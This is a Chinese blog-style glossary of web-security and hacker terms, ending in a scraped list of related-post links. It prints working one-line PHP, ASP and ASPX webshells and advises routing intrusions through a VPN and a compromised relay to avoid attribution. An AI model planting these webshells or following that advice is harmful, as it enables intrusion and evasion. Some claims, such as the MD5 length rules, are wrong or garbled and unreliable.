web安全的一些专业术语介绍
一、CMS(B/S)
CMS是网站内容管理系统。简单点说,我们做网站,一般是去网上下载一些源码,然后自己修改,别人写好的,这样是有后台的,别人可以去登入去管理。这样的源码,就叫CMS。常见的cms有dedecms,dz,南方等等。
医院常用的CMS:之梦
教育常用的CMS:之梦
博客类型网站常用的CMS:Wordpress
1、 动易CMS系统主要用于小型网站和个人网站。
2、酷源CMS:
酷源科技主要运营的产品有:KYCMS网站内容管理系统、B2B多用户商城系统、在线考试系统、子网站集群系统、酷源OA网络协同办公系统等。
酷源科技主要用户群体:个人网站、企事业单位网站、集团公司、政府单位、校园等。
3、YulinCMS (雨林内容管理系统) 是采用微软的.net技术进行架构、功能强大的网站管理软件
4、泽元CMS主要用于自助建站系统和大中型网站
5、dedeCMS是php+mysql的,大多数用户是个人站长。
6、 闪睿企业网站管理系统是一套针对企业的网站内容管理系统。他高效、智能、友好易用。
7、锐商企业CMS (COMSHARP CMS) 主要面向企业网站市场,以简洁稳重著称
8、FOOSUN (风讯内容管理系统)包括信息采集、整理、分类、审核、发布和管理的全过程,具备完善的信息管理和发布管理功能,是企事业单位网站、内部网站和各类ICP网站内容管理 和维护的理想工具。应用该系统,政府各部门可以随时方便地提交需要发布的信息而无须掌握复杂的技术;FoosunCMS已成为国产CMS“第一品牌”。
更加详细的介绍请看这篇博客https://blog.csdn.net/iteye_18879/article/details/81556360
二、肉鸡、抓鸡、跳板
肉鸡:被控制的电脑
抓鸡:你控制被人电脑的一个过程
跳板:如果你直接入侵别人电脑,就会记录你自己的IP。但是我用自己电脑控制的另一台电脑去入侵别人电脑,那么记录的就是另一台电脑的IP,那么这台电脑就是跳板
自己电脑要挂个VPN去连接肉鸡(跳板),然后去入侵(这种方式较安全)
三、一句话、小马、大马/webshell
1、一句话木马:
php:<?php eval($_POST["kxc"]);?>
asp:<% eval request("kxc") %> 或 <%execute(request("kxc"))%>
asxp:<%@ Page Lanuage="Jscript"%><%eval(Request.Item["kxc"])%>
一句话木马本身是没有危害的,关键在于我们传的参数。
小马是用来上传大马的。
它们都是webshall
四、webshell、提权
1、webshell其实就是网站后门.
2、提权就是提升权限的一个过程
五、MD5
加密算法,MD5加密后一般是哈希值(可能是16位或者36位),如果是20位,要去掉前3和最后一位
六、源码打包、脱裤
1、源码打包就是把整个网站的源码打包下来
2、脱裤就是整个数据库的敏感信息拖出来
黑客脱裤一般是拖user表
七、嗅探、rookit
1、嗅探:抓包分析数据包
2、rookit:隐藏级系统后面
八、“0Day”和“Warez”
其实0Day和Warez一直以来并没有一个确切的定义,这边就简单说下
0Day:“0Day”只是指在最短的时间内“破解”(并不强调当天破解),并在网上发布。
Warez:“Warez”就是“上传到网上让其它人免费下载的完全版软件”的意思。“Ware”来自于“SoftWare”,而之所以结尾加“z”而不加“s”(在英语中,名词后面加“s”表示复数形式,指很多东西),是因为加“z”的读音和“s”类似,但是看起来却完全不同——正如常见的英文名字写法应该是首字母大写,比如“Robbins”,黑客或者破解者们就偏偏喜欢写成“rOBBiNS”,将大小写颠倒以显得自己很另类,很“酷”。
所以,这个世界上其实并不存在某个叫做“Warez”或者“0Day”的组织,只是不断有人发布“0Day”和“Warez”罢了。
web安全的一些专业术语介绍相关推荐
- 数字营销专业术语介绍
1. CPM(Cost per mille),每千次展现收费 这是一种最为常见的广告模式,也是很多网站流量变现的一种途径,这种广告不管计算点击,或者什么注册下载之类的转化,只要这个广告在网站上被正常的 ...
- 炒股新手必看— —股票七大专业术语!!!
股票专业术语是指在股市中用来表达各种量能关系的特殊语言.对于初入股市的朋友来说,了解常用的股票专业术语非常必要,否则不光无法融入圈子,甚至连财经新闻都会看不懂.今天,我就给大家来一波股市术语的科普,一 ...
- 强化学习(一)——专业术语及OpenAI Gym介绍
强化学习(一)--专业术语及OpenAI Gym介绍 1. 专业术语 1.1 Agent(智能体) 1.2 Environment(环境) 1.3 State *s*(状态) 1.4 Action * ...
- css专业名词,CSS进阶系列一(flex布局基础知识——介绍、规范、主要思想、专业术语)...
一.介绍 flex是flexible box的缩写,意为弹性布局.flexible box是CSS3新增加的,用来为盒模型提供最大的灵活性.flex旨在提供一个更加有效的方式来布置,对齐和分布在容器之 ...
- 黑客专业术语——入门详细介绍
前言 黑客专业术语是黑客们及内部交流的专有名词,理解专业术语,对入门黑客是有必要的 1.肉鸡 所谓肉鸡,是一种很形象的比喻,指那些可以被黑客随意控制的电脑,可以随意操纵肉鸡,却又不被对方察觉. 2.木 ...
- 计算机专业术语简单释义
计算机专业术语简单释义 先简单声明两个基本概念 客户端 :是为客户提供本地服务的程序,最常见的有我们电脑上的浏览器 服务器 :就是指运行着服务软件的高性能计算机或计算机系统,用以存储数据,为客户提供信 ...
- 附录 区块链专业术语表
附录 区块链专业术语表 51% attack 51%攻击 alt-coin 替代性货币 arbitrary-state 任意状态 Autonomous Agent 自主运作的代理人 Autonomou ...
- 评估网站性能的专业术语
[写在前面] 对于运维的人来说,如何去架构服务器,如何让服务器能够将作用发挥到极致是比较重要的.那么想要去评估服务器好坏,得知道点儿专业术语不是~ 这篇文章就来讲讲评估网站性能的专业术语,对服务器的架 ...
- 计算机视觉专业术语总结:构建计算机视觉的知识体系
点击上方"3D视觉工坊",选择"星标" 干货第一时间送达 前言: 在计算机视觉中存在很多的专业术语,如先验知识,语义信息,embedding,head,neck ...
- 学计算机须知,学习计算机须知的50个专业术语
在我们生活中已经离不开计算机了, 但是计算机是国外发明的,因此涉及到很多的英文专业语会有很多小伙伴们吧了解,那么今天爱站小编就为大家介绍学习计算机须知的50个专业术语,大家快来看看吧. •PC:个人计 ...
最新文章
- Cobalt Strike 的安装与简单使用
- 阿里巴巴Druid,轻松实现MySQL数据库加密!
- 嗨,你真的懂this吗?
- JS转字符 判断数字等
- POJ - 3926 Parade(单调队列优化dp)
- JavaScript中的数组和字符串
- python拆分合并文件_Python 视频文件的分割和合并
- 一个好看的网站关站维护通告单页
- Typecho添加投稿功能插件
- c#常用类库----计算机信息类
- Typora入门基本教程
- 输入一个数,求1到他 的和(for循环)
- 今天 Java 14 正式发布了!放弃 Java 8 行吗?
- python字典用法总结
- 用java实现mysql数据可视化_java可视化界面操作数据库编程.doc
- CISSP考试过程,备考过程巨详细!
- php实现 合唱队形(算法想清楚在动)
- zemax设置 像方远心_像方远心光学系统具有以下特征
- iClap:产品经理再忙也要看《琅琊榜》
- web中各种命令注入的检测和利用二